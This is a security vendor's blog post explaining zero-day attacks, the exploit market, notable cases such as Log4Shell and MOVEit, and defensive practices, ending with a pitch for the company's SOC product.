Press TechRound interviews Secure.com CEO on the future of AI security
Read
Infrastructure Security Published: May 10, 2026 12 min read

Zero-Day Attacks: What They Are, How They Work, and How to Stop Them

Zero-day attacks hit before patches exist. Learn how they work, real-world examples, and what your team can do to defend against them.

By Secure.com

Key Takeaways

  • A zero-day attack exploits a software flaw the vendor has never seen before. No patch. No warning. No defense on day one.
  • In 2025, Google’s Threat Intelligence Group tracked 90 zero-days exploited in the wild. Enterprise technology was hit hardest, accounting for 48% of all zero-day targets.
  • Attackers are no longer just going after browsers and phones. VPNs, firewalls, and security appliances are now the primary targets.
  • A working zero-day exploit can sell for anywhere from $100,000 to $2 million on underground markets.
  • Traditional antivirus and signature-based tools cannot detect zero-days they’ve never seen before. Behavioral detection is the practical alternative.
  • Speed and visibility are the two things organizations actually control. Both are fixable.

Introduction

In 2025, the average time between a vulnerability being discovered and its active exploitation dropped to just 5 days. For zero-days, that window doesn’t exist at all. Attackers already know about the flaw. Your vendor doesn’t. And your team is flying blind.

What Is a Zero-Day Attack?

A zero-day attack happens when a threat actor exploits a software vulnerability before the software vendor knows it exists.

The name reflects the defender’s situation: the vendor has had zero days to fix the problem. There’s no patch to install. No alert to act on. The flaw is completely unknown to everyone except the attacker.

It’s worth knowing the difference between a few related terms that often get used as if they mean the same thing:

  • Zero-day vulnerability: The actual flaw in the software. A bug, a design error, or an unintended behavior that can be exploited.
  • Zero-day exploit: The code or method an attacker uses to take advantage of that flaw.
  • Zero-day attack: What happens when an attacker uses the exploit against a real target.

All three are connected, but the attack is the part that causes actual damage.

The Zero-Day Exploit Market

This is the part most people don’t realize exists.

Zero-day exploits are bought and sold like commodities. There’s a legal side, a grey side, and a fully criminal side. On the legal end, bug bounty programs pay researchers to responsibly report vulnerabilities. On the grey and criminal end, exploit brokers sell working zero-days to the highest bidder.

Between January 2023 and September 2024, researchers identified 547 listings on dark web forums and private Telegram channels advertising exploits for sale. More than half of those listings involved zero-day or one-day vulnerabilities.

Prices vary based on the target and how hard the exploit is to detect:

  • Remote code execution (RCE) exploits averaged around $100,000
  • A Microsoft Outlook zero-day sold for nearly $2 million
  • iPhone zero-days have fetched up to $7 million through certain brokers
  • Basic IoT device exploits can go for as little as $1,000

Buyers include nation-state intelligence agencies, ransomware groups, and commercial surveillance vendors. The flaw you don’t know about might already be changing hands somewhere.

How Zero-Day Attacks Work

Zero-days don’t come from nowhere. They follow a predictable path from discovery to damage.

The Attack Lifecycle

Here’s how a zero-day typically plays out:

  1. A flaw goes undetected inside software. The developer doesn’t know it’s there.
  2. An attacker or researcher finds it, often through reverse engineering, fuzzing, or code review.
  3. The attacker builds an exploit that takes advantage of the flaw.
  4. The attack is launched against a target before any patch exists.
  5. The vendor finds out, usually after reports of suspicious activity or a detected breach.
  6. A patch is rushed out, sometimes days or weeks after the damage is done.

During that window between steps 3 and 6, the attacker operates with no resistance from the software’s own security controls.

Who Actually Launches Zero-Day Attacks

Not everyone doing this has a government budget. But most of the sophisticated ones do.

Nation-state groups are the most prolific zero-day users. Chinese, Russian, North Korean, and Iranian threat actors consistently top attribution reports. Google’s Threat Intelligence Group attributed nearly 30% of zero-day exploitation in 2024 to groups backed by China alone.

Commercial surveillance vendors are a growing category. These are private companies that build and sell zero-day exploit chains to governments for intelligence purposes. Many attacks on journalists and activists have been traced back to tools sold by these vendors.

Ransomware groups also buy and use zero-days. Over 60% of ransomware attacks in 2024 used zero-day exploits. They don’t always develop these tools themselves; they purchase access through exploit brokers.

What Attackers Are Targeting Now

The target profile has shifted significantly in the last two years.

Attackers used to focus on browsers, mobile phones, and operating systems. That’s changing. In 2024, 44% of all zero-day exploitation targeted enterprise technologies. In 2025, that number held near 48%.

More specifically, attackers are going after the tools organizations use to protect themselves: VPNs, firewalls, and security appliances. In 2024, 20 of the 33 enterprise zero-days targeted security and networking products. These systems are attractive because they sit at the edge of the network, they rarely have endpoint detection tools installed, and compromising one often means full network access.

The companies with the most targeted zero-days in 2024 were Microsoft (26 vulnerabilities), Google (11), Ivanti (7), and Apple (5). Ivanti’s rise on that list reflects the broader shift toward attacking enterprise network perimeter devices.

Real-World Zero-Day Examples

Understanding how zero-days work in practice helps make the abstract threat concrete.

Stuxnet (2010)

Stuxnet remains one of the most sophisticated cyberweapons ever deployed. It exploited four separate zero-day vulnerabilities to target industrial control systems at Iran’s nuclear enrichment facilities. The worm caused physical damage to centrifuges by making them spin at incorrect speeds while reporting normal readings to operators. It’s widely attributed to a joint US-Israeli operation. The lesson: zero-days can cause physical, not just digital, destruction.

Log4Shell (2021)

A critical flaw in Apache Log4j, a logging library embedded in millions of applications, allowed attackers to execute code on vulnerable servers by sending a single text string. Severity score: 10 out of 10. At its peak, security firms tracked over 100 attacks per minute targeting this single flaw. Many organizations still don’t have full visibility into where Log4j runs in their environments. Years later, it remains one of the most exploited vulnerabilities in the CISA catalog.

MOVEit (2023)

The Cl0p ransomware group discovered and exploited a SQL injection flaw in MOVEit Transfer, a file transfer tool used by thousands of organizations. Exploitation began before Progress Software knew the flaw existed. Government agencies, universities, banks, and major corporations were all compromised. Some evidence suggests Cl0p was quietly testing the vulnerability as far back as 2021 while waiting for the right moment to strike at scale.

Ivanti VPN Zero-Days (2024)

Multiple zero-day vulnerabilities in Ivanti’s Connect Secure and Policy Secure products were exploited by Chinese state-backed threat actors. The attacks used advanced lateral movement techniques to stay hidden inside networks for extended periods. Healthcare organizations and manufacturers were primary targets. The campaign showed how a single compromised VPN appliance can become a full network entry point with minimal detection.

How to Defend Against Zero-Day Attacks

You cannot patch what you don’t know exists. But you can make your environment much harder to exploit and much faster to recover from.

Use Behavioral Detection, Not Just Signatures

Signature-based tools look for patterns they already recognize. Zero-days, by definition, have no known signature. Behavioral detection looks at what software is actually doing: what processes it’s spawning, what network calls it’s making, what files it’s touching. Unusual behavior gets flagged even without a known threat signature.

This includes endpoint detection and response (EDR) tools, network traffic analysis, and anomaly-based alerting.

Shrink Your Attack Surface

Every application, port, and service that doesn’t need to be running is an opportunity for an attacker to find something you missed. Remove unnecessary software. Disable services that aren’t in use. Apply the principle of least privilege so that if one account or system is compromised, the damage is contained.

Apply Zero Trust Architecture

Zero trust means no user, device, or system is automatically trusted, even if they’re already inside the network. Every access request is verified. This doesn’t stop a zero-day, but it limits what an attacker can do after they get in. Lateral movement becomes harder. Sensitive systems stay isolated.

Patch Everything Else Fast

Zero-days are the ones you can’t patch. Everything else, you can. Organizations that take months to apply patches are handing attackers a well-documented path in. CISA’s Known Exploited Vulnerabilities catalog is the clearest signal of what’s being actively used in real attacks. Anything on that list should be treated as an emergency.

Explore how continuous vulnerability management keeps your known exposure at a minimum.

Build and Test an Incident Response Plan

When a zero-day hits, your team has hours, not days, to contain it. Organizations without a tested incident response plan take far longer to isolate the threat, and every hour matters. Run tabletop exercises. Know who makes what decisions and in what order. Define what “containment” looks like before you need it.

Keep Full Asset Visibility

You cannot protect what you don’t know exists. Unmanaged endpoints, forgotten cloud instances, and shadow IT are common zero-day entry points. If an attacker finds an asset your team doesn’t know about, they have time to operate without any pressure. Continuous asset discovery closes that gap.

How Secure.com Helps

Zero-day defense isn’t just a technology problem. It’s a speed and visibility problem. And most lean security teams don’t have enough of either.

Secure.com’s Digital Security Teammates are built for exactly this situation. The SOC Teammate works continuously so your team doesn’t have to start from scratch every time something new surfaces.

Here’s what that looks like in practice:

  • Continuous asset visibility: Every device, endpoint, and system in your environment is discovered and mapped through agentless scanning. The platform maintains a living knowledge graph that reveals shadow IT and unmanaged assets before attackers can exploit them.
  • AI-driven alert triage: The SOC Teammate automatically enriches alerts with asset criticality, threat intelligence, and business context, then prioritizes based on real risk—not just CVSS scores. Your analysts see a ranked queue of what actually matters, with 75% faster triage time.
  • Unified knowledge graph: Asset relationships, vulnerability context, identity data, and threat intelligence connect in a living graph that updates in real time. When a zero-day is disclosed, you instantly see which assets are affected, who owns them, what data they touch, and what the blast radius looks like—without jumping between tools.
  • Automated remediation workflows: When a zero-day patch drops, the platform automatically identifies affected assets, assigns ownership via HRMS integration, creates tickets in Jira/ServiceNow with full context, and tracks remediation SLAs. Low-risk patches can be deployed automatically; high-impact changes require human approval with full audit trails.

The 5-day exploit window is real. Secure.com Digital Security Teammates are built to help your team move inside it—with 30-40% faster detection (MTTD), 45-55% faster response (MTTR), and automated workflows that turn vulnerability disclosures into prioritized remediation work in minutes, not days.

FAQs

How do attackers find zero-day vulnerabilities?
Several ways. Some attackers hire dedicated researchers to comb through code and look for flaws. Others buy working exploits from brokers on private forums or dark web channels. Nation-state groups often have teams of full-time vulnerability researchers. AI tools are also accelerating discovery on both sides: researchers found that GPT-4 could exploit known software vulnerabilities with an 87% success rate just by reading CVE descriptions, and similar tools are being used offensively to speed up flaw discovery.
Can antivirus software detect a zero-day attack?
Not reliably. Traditional antivirus tools match activity against a database of known threats. A zero-day has no entry in that database, so it won’t trigger a signature-based alert. Modern endpoint protection platforms use behavioral detection to catch suspicious activity regardless of whether a signature exists. That’s why a layered approach, including behavioral analytics, network monitoring, and EDR tools, matters far more than antivirus alone.
Who is most at risk from zero-day attacks?
Enterprise organizations are increasingly the primary target. In 2025, 48% of all zero-day exploits targeted enterprise technology, with VPNs, firewalls, and security appliances being the top targets. That said, widely used consumer software like browsers and mobile operating systems also remain targets. Log4Shell is a reminder that a flaw in a library used everywhere can expose virtually any organization, regardless of size.
How long does a zero-day stay dangerous?
Until it’s patched, which can take days, weeks, or much longer. Some zero-days are exploited quietly for months before detection. The MOVEit vulnerability showed signs of attacker testing going back two years before the main campaign launched. Even after a patch is released, the flaw effectively becomes an n-day vulnerability, still dangerous for any organization that hasn’t applied the fix. Log4Shell was still appearing in CISA’s top exploited list years after its initial patch was released.

Conclusion

Zero-day attacks are the hardest category of threat to defend against. You cannot patch a flaw you don’t know exists. You cannot write a signature for an exploit that’s never been seen before.

But that doesn’t mean there’s nothing you can do.

Organizations that get hit hardest are usually the ones with poor visibility into their own environment, slow patching habits for known issues, and detection tools built entirely on signatures. Fix those three things and you’ve already put yourself well ahead of most targets.

Zero-days will keep coming. The organizations that survive them aren’t the ones with the biggest budgets. They’re the ones that see faster, respond faster, and don’t give attackers a comfortable place to hide.

Related Blogs